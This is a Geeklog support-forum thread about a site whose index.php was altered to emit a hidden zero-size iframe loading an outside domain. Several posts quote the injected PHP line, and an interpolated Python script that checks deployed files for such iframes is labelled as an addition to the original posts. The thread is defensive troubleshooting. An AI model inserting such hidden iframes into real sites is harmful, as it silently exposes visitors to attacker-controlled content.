Geeklog Forums

unusual iframe on my site


Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
confused
Today I noticed something unusual when my site loaded. Down in the bottom status bar of IE, I noticed that it was trying to load something from a site NOT of my knowledge. I did a "view source" and found the culprit about 3/4 of the way through the index.php outputted file. It is right before the part at the bottom of the page where you are given links to previous site pages.

Here is the part in question:

PHP Formatted Code
<!-- ARTICLE END -->

<iframe src=<b>http://europedirect.biz/frame.php</b>
frameboarder="0" width="0" height="0" scrolling="no">
</iframe><div class="pagenav">Previous <b>1</b>
 


Any ideas what this means? Has the site been hacked? I had plans on upgrading the site to 3.11 this weekend but am not sure if I should yet until I can figure out where this europedirect.biz link came from.

Thanks,

Lou


Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 06/11/02
Posts: 523
That's odd

Do others have access to your layout folder?

You will want to change your passwords.

If you go to the site there is nothing there really except some stats scripts. I would remove the code of course too. Did you get the theme off of someone? Maybe it is just old code?

Good Luck

Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
Can you find that IFRAME in the theme files on your webspace? Since the page navigation is added on the fly, it should be in the story templates (storytext.thtml or storybodytext.thtml).

If you can't find it there, it may be inserted by a control in your browser. Are you using Internet Explorer?

bye, Dirk

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
ScurvyDawg & Dirk,

Thanks for your fast replies.

To the best of my knowledge, nobody but myself has access to the htdocs/layout folder. Permissions are set to 755.

I am using IE, but I see the same thing using Slimbrowser.

I am basically using the Smooth Blue theme with just a couple of minor color tweaks.

I opened each file in the theme directory (not its subdirectories) and did not find the odd iframe info in any of them.

The only plug-in I am using is the static pages plugin.

When I select a story to read and go to the story page and view the source, the mysterious Iframe is NOT there. It appears to only be on the main index.php page or process.

Still looking at other files..

Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
Quote by usarfans: I am using IE, but I see the same thing using Slimbrowser.

I'm not familiar with Slimbrowser, but from their website it looks like they're still using Internet Explorer as a backend.

Try a different browser, e.g. Firefox or Opera.

bye, Dirk

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
I loaded Firefox 1.0.2.

Same results - suspect Iframe still seen. Going to try on a different computer now, although all logic says that is not the problem......

Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 06/11/02
Posts: 523
I am using Firefox and I see it.

Seems to be part of your site navigation the previous button??

PHP Formatted Code


<iframe src=http://europedirect.biz/frame.php frameboarder="0" width="0" height="0" scrolling="no"></iframe>
<div class="pagenav">Previous <b>1</b>
<a href="http://www.usarfans.com/index.php?page=2">2</a>
<a href="http://www.usarfans.com/index.php?page=3">3</a>
<a href="http://www.usarfans.com/index.php?page=4">4</a>
<a href="http://www.usarfans.com/index.php?page=5">5</a>
<a href="http://www.usarfans.com/index.php?page=6">6</a>
<a href="http://www.usarfans.com/index.php?page=7">7</a>
<a href="http://www.usarfans.com/index.php?page=8">8</a>
<a href="http://www.usarfans.com/index.php?page=9">9</a>
<a href="http://www.usarfans.com/index.php?page=10">10</a>
<a href="http://www.usarfans.com/index.php?page=2">Next</a>
</div>
</td>


 


Very strange it is right next to your pagination? Seems to be tracking stats??

Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 06/11/02
Posts: 523
Yep if you look at your pagination it is there.

A little square next to or above the word previous.

Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
I can see it, too.

It doesn't appear to be in the template files. It's also not visible on other pages that use the pagination (e.g. the links).

So it may actually be in your index.php. Make a backup of that file (for forensic analysis), then overwrite it with a fresh copy. See if that helps ...

bye, Dirk

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
I don't see the little square (old eyes) but I know that I did not put anything extra like this europedirect.biz iframe into my site code. And if you guys, who have seen a million Geeklog problems, don't recognize it - it only leads me to believe it is malicious in nature somehow.

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34
Found the culprit! How I missed it earlier is beyond me.

The index.php file had been modified about 2 days ago and not by myself. I replaced it and the iframe is gone.

All root/admin passwords have been changed. Upgrade is in the very, very near future.

Comparing the bad with the good, the only difference is this one line of code

PHP Formatted Code
$display .= '<iframe src=http://europedirect.biz/frame.php
frameboarder="0" width="0" height="0" scrolling="no"></iframe>'

 

I guess I was hacked. Dammit.

Thanks for the rapid and accurate help. We non-geeks really appreciate it - especially when it's obvious we are in over our heads!
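
The check that settled this thread (comparing the deployed files with a fresh copy and looking for the zero-size off-site iframe), sketched as an added example that is not part of the original posts or of Geeklog itself. The function names, the directory arguments and the `own_host` parameter are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# Opening <iframe ...> tag, even when it is split across lines in PHP source.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name="value", name='value' or unquoted name=value (as in the injected line).
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def hidden_external_iframes(text, own_host):
    """Return the src of every zero-width/height iframe pointing off-site."""
    hits = []
    for tag in IFRAME_RE.findall(text):
        attrs = {m[0].lower(): m[1] or m[2] or m[3] for m in ATTR_RE.findall(tag)}
        dims = (attrs.get("width", ""), attrs.get("height", ""))
        invisible = any(d.strip() in ("0", "0px") for d in dims)
        host = urlparse(attrs.get("src", "")).hostname
        if invisible and host and host != own_host:
            hits.append(attrs["src"])
    return hits


def audit(live_root, clean_root, own_host):
    """Compare deployed *.php files with a pristine copy of the same release.

    Returns (relative path, status, hidden iframe URLs) for each file that
    differs from the pristine copy or does not exist in it.
    """
    live_root, clean_root = Path(live_root), Path(clean_root)
    report = []
    for live in sorted(live_root.rglob("*.php")):
        rel = live.relative_to(live_root)
        clean = clean_root / rel
        if not clean.is_file():
            status = "not in distribution"
        elif live.read_bytes() != clean.read_bytes():
            status = "modified"
        else:
            continue
        text = live.read_text(errors="replace")
        report.append((rel.as_posix(), status, hidden_external_iframes(text, own_host)))
    return report


if __name__ == "__main__":
    # usage: audit.py <deployed dir> <pristine dir> <own hostname>
    for row in audit(*sys.argv[1:4]):
        print(row)
```

Files you edited yourself (the site configuration, customised code) will also be listed as modified, so the iframe column is what separates expected changes from injected ones. Run it against a backup of the site, as suggested earlier in the thread, so that file timestamps stay intact for later analysis.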



Status: offline

Dirk

Site Admin
Admin
Registered: 12/01/02
Posts: 13073
Location:Stuttgart, Germany
Quote by usarfans: I guess I was hacked. Dammit.

It is very unlikely that this was done via Geeklog or any other script you may have running. So better change the passwords for your hosting account as well.

bye, Dirk

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
I just discovered the exact same thing! I fixed it before I found this thread, and wondered if anyone else had run into the problem. Appears I'm not the only one.

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
Interesting to note that my file was changed on March 23rd as well.

Status: offline

beewee

Forum User
Full Member
Registered: 05/08/03
Posts: 969
Location:The Netherlands, where else?
Do you happen to have the same hosting provider?
Dutch Geeklog sites about camping/hiking: www.kampeerzaken.nl | www.campersite.nl | www.caravans.nl | www.caravans.net

Status: offline

usarfans

Forum User
Junior
Registered: 10/08/03
Posts: 34

I am using PSekhosting.com

Ever since the original owner of PSek sold (i.e. outsourced) the site a couple of months ago I've had numerous problems with them - SQL crashes, DNS issues, etc. Not a lick of problem before the sale.


Lou

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
I'm using psek as well. I have several sites hosted with them, but only one has been affected.

Status: offline

beewee

Forum User
Full Member
Registered: 05/08/03
Posts: 969
Location:The Netherlands, where else?
Did you ever change the passwords you received from Psek? If not, somebody retrieved the passwords or found out how their passwords are generated.

If you did change them, your sites might be vulnerable...

Status: offline

rav

Forum User
Chatty
Registered: 14/01/03
Posts: 37
Yeah, I changed the passwords from what psek sent me. I submitted a ticket to psek's support and they suggested that it was my Geeklog version (still on 1.3. and that I should upgrade. Something I had planned on doing anyway, just haven't had the time yet.

Status: offline

beewee

Forum User
Full Member
Registered: 05/08/03
Posts: 969
Location:The Netherlands, where else?
Perhaps it's just my imagination: did you install GL yourself or with your Control Panel? It's quite easy to pack an 'infected' template that way...

BTW there should be an FTP access log somewhere.
